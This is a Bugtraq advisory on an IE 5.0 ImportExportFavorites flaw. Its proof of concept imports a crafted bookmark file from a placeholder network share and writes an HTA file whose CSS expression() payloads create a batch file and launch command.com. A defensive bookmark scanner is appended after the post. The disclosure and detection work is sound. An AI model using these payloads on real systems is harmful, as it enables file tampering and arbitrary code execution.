Bugtraq mailing list archives
IE 5.0 security vulnerabilities - ImportExportFavorites - at least creating and overwriting files, probably executing programs
From: joro () NAT BG (Georgi Guninski)
Date: Thu, 9 Sep 1999 16:54:33 +0300
Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.0 under Windows 95/NT 4.0 (I suppose Win98 is vulnerable) allows creating and overwriting local files and in SOME cases putting content in them using the window.external.ImportExportFavorites() method. In SOME cases putting content in the file is possible, which means arbitrary programs may be executed.

Details:
The problem is the window.external.ImportExportFavorites() method, which is used to import and export bookmarks from and to Netscape Communicator. The bigger problem is that it allows creating and overwriting files, which obviously leads to a dangerous DoS attack. One may overwrite critical files, which may lead to reinstalling Windows.

Example of this is:

<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>

which will create a file c:\fav.hta containing IE's favorites without asking the user, just notifying him that the operation is successful.

In SOME cases, HTML code may be injected in the exported file by importing a specially designed HTML file. The file to be imported may reside on a Samba or Windows file server and may be accessed by Microsoft Networking. The difficult part is that this must be exported using only the <A> tag, but HTML Applications help again.

I have verified importing on a Windows NT 4.0 box directly connected to the Internet and it worked fine. But I could not reproduce importing favorites with Windows 95 connected to the Internet via dial-up; I do not have enough network resources to investigate further.

I SHALL MUCH APPRECIATE IT IF SOME NETWORK GURU EXPLAINS TO ME WHY IMPORTING USING MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES AND CONFIRMS OR DENIES THE POSSIBILITY OF IMPORTING FAVORITES FROM A NETWORK FILE SERVER.

It is possible to import the file using the "http" protocol, but then the user must click the default button YES; Microsoft does not warn about any security problems in this case.

So the code looks like this:

In a HTML file:
------------------------------------------------------------------
<SCRIPT>
// you must change the IP or make the file local !!!!!!!!!!
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");
// Sure, the StartUp folder is better
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
------------------------------------------------------------------

In the imported file (fav.imp), residing on a Samba or Windows server without authentication:
-------------------------------------------------------------------
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="#" STYLE="left:expression(eval('f= new ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT created\');window.close();'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program started\');window.close()'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>
</DL>
-------------------------------------------------------------------

To see the effect, start c:\fav.hta (it may be placed in the StartUp folder and executed automatically).

This vulnerability can be exploited via email or Usenet message using window.open(). The user must have file sharing installed in order for remote importing to work.

Workaround: Disable Active Scripting

Demonstration is available at http://www.nat.bg/~joro/imp.html

Regards,
Georgi Guninski
http://www.nat.bg/~joro
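A defender-side check suggested by the injection vector in the advisory above, added here as an example and not part of Guninski's post or of any Microsoft code: a small Python scanner that parses a Netscape-format bookmark file before it is imported and flags entries whose STYLE attribute carries a CSS expression(), whose HREF uses a script URL scheme, or which carry event-handler or other unexpected attributes. The allowlist of expected attributes and the sample bookmark file are assumptions constructed for this example.

```python
import re
from html.parser import HTMLParser

# Attributes a legitimate bookmark entry is expected to carry (assumption,
# based on the attributes used in the advisory's sample file).
EXPECTED_ATTRS = {"href", "add_date", "last_visit", "last_modified"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")
CSS_EXPR = re.compile(r"expression\s*\(", re.IGNORECASE)


class BookmarkScanner(HTMLParser):
    """Walk every <A> entry and record attributes that would run script."""

    def __init__(self):
        super().__init__()
        self.entries = 0
        self.findings = []  # (line number, attribute name, reason)

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        self.entries += 1
        line = self.getpos()[0]
        for name, value in attrs:  # HTMLParser lowercases attribute names
            value = value or ""
            if name.startswith("on"):
                self.findings.append((line, name, "event handler attribute"))
            elif name == "style" and CSS_EXPR.search(value):
                self.findings.append((line, name, "CSS expression() runs script in IE"))
            elif name == "href" and value.strip().lower().startswith(SCRIPT_SCHEMES):
                self.findings.append((line, name, "script URL scheme"))
            elif name not in EXPECTED_ATTRS:
                self.findings.append((line, name, "unexpected attribute"))


def scan_bookmarks(text):
    """Return (number of entries, list of findings) for a bookmark file."""
    scanner = BookmarkScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.entries, scanner.findings


# Constructed sample: one benign entry, one STYLE expression(), one script URL.
SAMPLE = """<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="http://www.example.com/" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">Example</A>
<DT><A HREF="#" STYLE="left:expression(alert('constructed'))" ADD_DATE="923225094">injected</A>
<DT><A HREF="javascript:alert('constructed')" ADD_DATE="923225094">script url</A>
</DL>
"""

if __name__ == "__main__":
    for line, attr, why in scan_bookmarks(SAMPLE)[1]:
        print(f"line {line}: {attr}: {why}")
```

Run before importing a bookmark file obtained from an untrusted share or URL; any finding means the file should not be fed to the importer.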